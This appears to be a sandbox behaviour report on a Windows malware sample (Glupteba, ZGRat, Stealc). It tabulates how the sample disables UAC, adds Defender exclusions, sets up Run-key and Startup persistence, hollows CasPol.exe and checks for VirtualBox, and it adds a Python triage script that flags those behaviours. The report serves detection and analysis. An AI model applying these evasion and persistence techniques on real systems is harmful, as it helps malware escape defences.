Analysis Overview
SHA256: ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620
Threat Level: Known bad
The file ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620 was found to be: Known bad.
Malicious Activity Summary
Glupteba
UAC bypass
ZGRat
Detect ZGRat V1
Glupteba payload
Windows security bypass
Stealc
Modifies boot configuration data using bcdedit
Possible attempt to disable PatchGuard
Downloads MZ/PE file
Modifies Windows Firewall
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Drops startup file
Windows security modification
Executes dropped EXE
UPX packed file
Loads dropped DLL
Manipulates WinMon driver.
Adds Run key to start application
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Manipulates WinMonFS driver.
Checks installed software on the system
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Checks for VirtualBox DLLs, possible anti-VM trick
Launches sc.exe
Enumerates physical storage devices
Program crash
Modifies system certificate store
Creates scheduled task(s)
Suspicious behavior: LoadsDriver
System policy modification
GoLang User-Agent
Checks SCSI registry key(s)
Uses Task Scheduler COM API
Suspicious use of FindShellTrayWindow
Checks processor information in registry
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK mapping: Enterprise Matrix V15 (technique list not captured in this export)
Analysis: static1
Reported: 2024-05-08 23:52
Signatures: none listed for this analysis

Analysis: behavioral1
Submitted: 2024-05-08 23:52
Reported: 2024-05-08 23:57
Platform: win7-20240508-en
Max time kernel: 298s
Max time network: 291s
Command Line: not captured
Signatures
Detect ZGRat V1
3 matches; indicator details not captured in this export.
Glupteba
Glupteba payload
20 matches; indicator details not captured in this export.
Stealc
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe | N/A |

Writing EnableLUA = 0 already requires administrative rights and only takes effect after a reboot, so this row records UAC being switched off for later stages rather than bypassed; the same write appears again under "Checks whether UAC is enabled" below.
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\DgEQpmig2k2u8ahd5cM0IXOL.exe = "0" | C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\yNIUqrzSFbniO7QgiDNi1e5u.exe = "0" | C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\2U5ElIDy3tFD0tPHgA1ebjtp.exe = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\JziJRjwTPjmAIVQ7YR4wEkVF.exe = "0" | C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
ZGRat
Modifies boot configuration data using bcdedit
14 invocations of C:\Windows\system32\bcdedit.exe; the arguments were not captured in this export.
Command and Scripting Interpreter: PowerShell
1 invocation of C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; the command line was not captured in this export.
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\Winmon.sys | C:\Windows\rss\csrss.exe | N/A |
Modifies Windows Firewall
4 invocations of C:\Windows\system32\netsh.exe; the arguments were not captured in this export.
Possible attempt to disable PatchGuard
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b6qsLfkqIoTPwoWsUv6y5Cxm.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e9ZoIBhiec9y0MQ8LN1Ew4A7.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7thwCggTlPUkHNTYhfDZ8bBD.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8kdfOL5pS2ZJD6XKGWDerABo.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9X5eQ89hOsyIn0HVfNoLbArx.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qFp7wCxROjWfnJ9EWLOFXkId.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lRQGxNAaydztbjZ2MhKqsJyR.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Executes dropped EXE
Loads dropped DLL
UPX packed file
4 matches; file details not captured in this export.
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\DgEQpmig2k2u8ahd5cM0IXOL.exe = "0" | C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\yNIUqrzSFbniO7QgiDNi1e5u.exe = "0" | C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\2U5ElIDy3tFD0tPHgA1ebjtp.exe = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\JziJRjwTPjmAIVQ7YR4wEkVF.exe = "0" | C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
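The UAC, Windows Defender exclusion, Startup-folder and Run-key rows above are exactly the registry and file-create telemetry an EDR emits. As an added example (not code from the sandbox, the malware or this report), the Python below encodes the four checks a detection engineer would want over rows in the report's own layout: EnableLUA set to 0, any write under the Defender Exclusions key (with a stricter verdict when the writer excludes its own image or directory), a Run entry whose image borrows a Windows process name from outside System32/SysWOW64, and a script dropped into the Startup folder. The sample rows are constructed copies of rows shown above plus one benign entry (a OneDrive Run value) that must not fire; the rule names, the benign row and the list of process names checked for masquerading are assumptions.

```python
"""Triage rules for the registry and file-create rows shown in this report.
Added example (not sandbox or malware code); rule names, the benign
contrast row and the masquerade name list are assumptions."""
import re
from typing import NamedTuple


class Finding(NamedTuple):
    rule: str
    process: str
    detail: str


# Constructed sample rows in the report's (description, indicator, process)
# column layout; the last row is a benign Run entry that must not fire.
SAMPLE_ROWS = [
    ("Set value (int)",
     r'\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"',
     r"C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe"),
    ("Set value (int)",
     r'\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"',
     r"C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe"),
    ("Set value (int)",
     r'\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\2U5ElIDy3tFD0tPHgA1ebjtp.exe = "0"',
     r"C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe"),
    ("Set value (int)",
     r'\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"',
     r"C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe"),
    ("Set value (str)",
     r'\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""',
     r"C:\Windows\rss\csrss.exe"),
    ("File created",
     r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b6qsLfkqIoTPwoWsUv6y5Cxm.bat",
     r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"),
    ("Set value (str)",
     r'\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive = "\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\""',
     r"C:\Program Files\Microsoft OneDrive\OneDrive.exe"),
]

UAC_POLICY_KEY = "hklm\\software\\microsoft\\windows\\currentversion\\policies\\system"
DEFENDER_EXCL = "hklm\\software\\microsoft\\windows defender\\exclusions\\"
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Assumed minimal set of Windows process names that malware borrows for masquerading.
SYSTEM_IMAGES = {"csrss.exe", "smss.exe", "lsass.exe", "svchost.exe", "winlogon.exe", "services.exe"}
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(once)?\\[^\\]+$", re.I)
STARTUP_RE = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.(bat|cmd|vbs|js|lnk|ps1)$", re.I)
IMAGE_RE = re.compile(r'"?([a-z]:\\[^"]*?\.exe)', re.I)


def normalize_key(path: str) -> str:
    """Map the NT-native hive names used in the report to HKLM/HKU form."""
    path = re.sub(r"^\\REGISTRY\\MACHINE\\", r"HKLM\\", path, flags=re.I)
    return re.sub(r"^\\REGISTRY\\USER\\", r"HKU\\", path, flags=re.I)


def unquote_data(data: str) -> str:
    """Undo the report's quoting of value data: outer quotes, doubled
    backslashes and escaped inner quotes."""
    data = data.strip()
    if len(data) >= 2 and data[0] == data[-1] == '"':
        data = data[1:-1]
    return data.replace("\\\\", "\\").replace('\\"', '"').strip('"')


def triage(rows) -> list:
    """Return one Finding per row that matches a rule, in row order."""
    findings = []
    for desc, indicator, proc in rows:
        proc_l = proc.lower()
        if desc.startswith("Set value"):
            path, _, raw = indicator.rpartition(" = ")
            key = normalize_key(path)
            key_l = key.lower()
            parent, _, name = key_l.rpartition("\\")
            value = unquote_data(raw)
            if parent == UAC_POLICY_KEY and name == "enablelua" and value == "0":
                findings.append(Finding("uac_disabled", proc, key))
            elif key_l.startswith(DEFENDER_EXCL):
                # Value name under Exclusions\Paths or \Processes is the excluded item.
                kind, _, excluded = key_l[len(DEFENDER_EXCL):].partition("\\")
                own_name = proc_l.rsplit("\\", 1)[-1]
                is_self = ((kind == "processes" and excluded == own_name)
                           or (kind == "paths" and proc_l.startswith(excluded.rstrip("\\") + "\\")))
                rule = "defender_self_exclusion" if is_self else "defender_exclusion"
                findings.append(Finding(rule, proc, f"{kind}: {excluded}"))
            elif RUN_KEY_RE.search(key):
                match = IMAGE_RE.match(value)
                image = (match.group(1) if match else value).lower()
                if image.rsplit("\\", 1)[-1] in SYSTEM_IMAGES and not image.startswith(SYSTEM_DIRS):
                    findings.append(Finding("masquerading_run_entry", proc, image))
                elif image.startswith("c:\\windows\\") and not image.startswith(SYSTEM_DIRS):
                    findings.append(Finding("run_entry_outside_system_dirs", proc, image))
        elif desc == "File created" and STARTUP_RE.search(indicator):
            findings.append(Finding("startup_script_dropped", proc, indicator.rsplit("\\", 1)[-1]))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_ROWS):
        print(f"{finding.rule:28} {finding.process}  ->  {finding.detail}")
```

The csrss.exe exclusion written by 2U5ElIDy3tFD0tPHgA1ebjtp.exe comes out as a plain exclusion while the one naming its own image comes out as a self-exclusion; on a live event stream the former becomes high-confidence once it is correlated with the later file create of C:\Windows\rss\csrss.exe shown under "Drops file in Windows directory".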
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Manipulates WinMon driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMon | C:\Windows\rss\csrss.exe | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2604 set thread context of 2796 | N/A | C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |

Rewriting the thread context of a freshly created CasPol.exe (a signed .NET utility) is the process-hollowing pattern; the hollowed CasPol.exe is the process that then drops the Startup-folder .bat files listed above.
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe | N/A |

Despite the signature name, the indicator is not a DLL: \??\VBoxMiniRdrDN is the device object of the VirtualBox shared-folders driver from the guest additions, and a successful open tells the sample it is running inside a VirtualBox guest.
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File created | C:\Windows\Logs\CBS\CbsPersist_20240508235243.cab | C:\Windows\system32\makecab.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe | N/A |

The CbsPersist_*.cab created by makecab.exe is routine servicing-log compaction by Windows and is unrelated to the sample. The remaining rows are the four Pictures\*.exe stages each staging csrss.exe into the non-standard directory C:\Windows\rss, and that csrss.exe in turn dropping C:\Windows\windefender.exe.
Launches sc.exe
1 invocation of C:\Windows\SysWOW64\sc.exe; the arguments were not captured in this export.
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\u1ls.0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\u1ls.0.exe | N/A |
Creates scheduled task(s)
2 invocations of C:\Windows\system32\schtasks.exe; the arguments were not captured in this export.
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-201 = "US Mountain Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-441 = "Arabian Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-292 = "Central European Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-521 = "N. Central Asia Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
